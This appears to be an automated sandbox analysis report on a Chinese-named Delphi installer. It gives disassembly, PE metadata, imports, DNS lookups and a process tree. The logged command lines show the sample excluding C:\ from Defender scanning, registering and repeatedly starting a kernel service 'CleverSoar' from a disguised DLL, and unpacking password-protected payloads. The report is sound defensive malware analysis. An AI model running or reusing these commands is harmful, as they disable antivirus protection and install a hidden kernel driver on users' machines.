                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007FE270CEA995h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007FE270D7C31Bh
                            call 00007FE270D7BE6Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007FE270D76B48h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007FE270CE4A43h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007FE270D77E73h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007FE270D7C3A3h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007FE270D8308Ah
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007FE270D78768h
                            mov edx, dword ptr [004B4200h]

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc0xcb0000x110000x110008d101b7c7b614b140e68d57e4bcf7223False0.18781594669117646data3.7235859696272633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                            RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                            RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                            RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                            RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                            RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                            RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                            RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                            RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                            RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                            RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                            RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                            RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                            RT_STRING0xd8e000x3f8data0.3198818897637795
                            RT_STRING0xd91f80x2dcdata0.36475409836065575
                            RT_STRING0xd94d40x430data0.40578358208955223
                            RT_STRING0xd99040x44cdata0.38636363636363635
                            RT_STRING0xd9d500x2d4data0.39226519337016574
                            RT_STRING0xda0240xb8data0.6467391304347826
                            RT_STRING0xda0dc0x9cdata0.6410256410256411
                            RT_STRING0xda1780x374data0.4230769230769231
                            RT_STRING0xda4ec0x398data0.3358695652173913
                            RT_STRING0xda8840x368data0.3795871559633027
                            RT_STRING0xdabec0x2a4data0.4275147928994083
                            RT_RCDATA0xdae900x10data1.5
                            RT_RCDATA0xdaea00x310data0.6173469387755102
                            RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                            RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                            RT_VERSION0xdb2980x584dataEnglishUnited States0.2776203966005666
                            RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                            Imports

                            DLLImport
                            kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dllInitCommonControls
                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                            Exports

                            NameOrdinalAddress
                            __dbk_fcall_wrapper20x40fc10
                            dbkFCallWrapperAddr10x4b063c

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 24, 2024 05:02:00.176995039 CET1.1.1.1192.168.2.40x5213No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                            Dec 24, 2024 05:02:00.176995039 CET1.1.1.1192.168.2.40x5213No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                            Dec 24, 2024 05:02:00.176995039 CET1.1.1.1192.168.2.40x5213No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                            Dec 24, 2024 05:02:00.176995039 CET1.1.1.1192.168.2.40x5213No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                            Dec 24, 2024 05:02:00.176995039 CET1.1.1.1192.168.2.40x5213No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                            Dec 24, 2024 05:02:06.823213100 CET1.1.1.1192.168.2.40x8754No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                            Dec 24, 2024 05:02:06.823213100 CET1.1.1.1192.168.2.40x8754No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                            Dec 24, 2024 05:02:06.823213100 CET1.1.1.1192.168.2.40x8754No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                            Dec 24, 2024 05:02:06.823213100 CET1.1.1.1192.168.2.40x8754No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                            Dec 24, 2024 05:02:06.823213100 CET1.1.1.1192.168.2.40x8754No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:23:01:40
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
                            Imagebase:0x5c0000
                            File size:5'986'125 bytes
                            MD5 hash:315719354DB8520278AE3D022B90DA14
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:1
                            Start time:23:01:40
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
                            Imagebase:0xb0000
                            File size:3'366'912 bytes
                            MD5 hash:FFE4B45A6AE66BCB0FA01197725E2E27
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:23:01:41
                            Start date:23/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:3
                            Start time:23:01:41
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:23:01:44
                            Start date:23/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff693ab0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:5
                            Start time:23:01:49
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
                            Imagebase:0x5c0000
                            File size:5'986'125 bytes
                            MD5 hash:315719354DB8520278AE3D022B90DA14
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            General

                            Target ID:6
                            Start time:23:01:49
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$100214,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
                            Imagebase:0x7ff70f330000
                            File size:3'366'912 bytes
                            MD5 hash:FFE4B45A6AE66BCB0FA01197725E2E27
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:7
                            Start time:23:01:51
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:23:01:51
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):true
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x580000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:23:01:51
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0x6b0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal, Browse
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:10
                            Start time:23:01:51
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:11
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:12
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0x6b0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:13
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:14
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:15
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:28
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:29
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:31
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:32
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
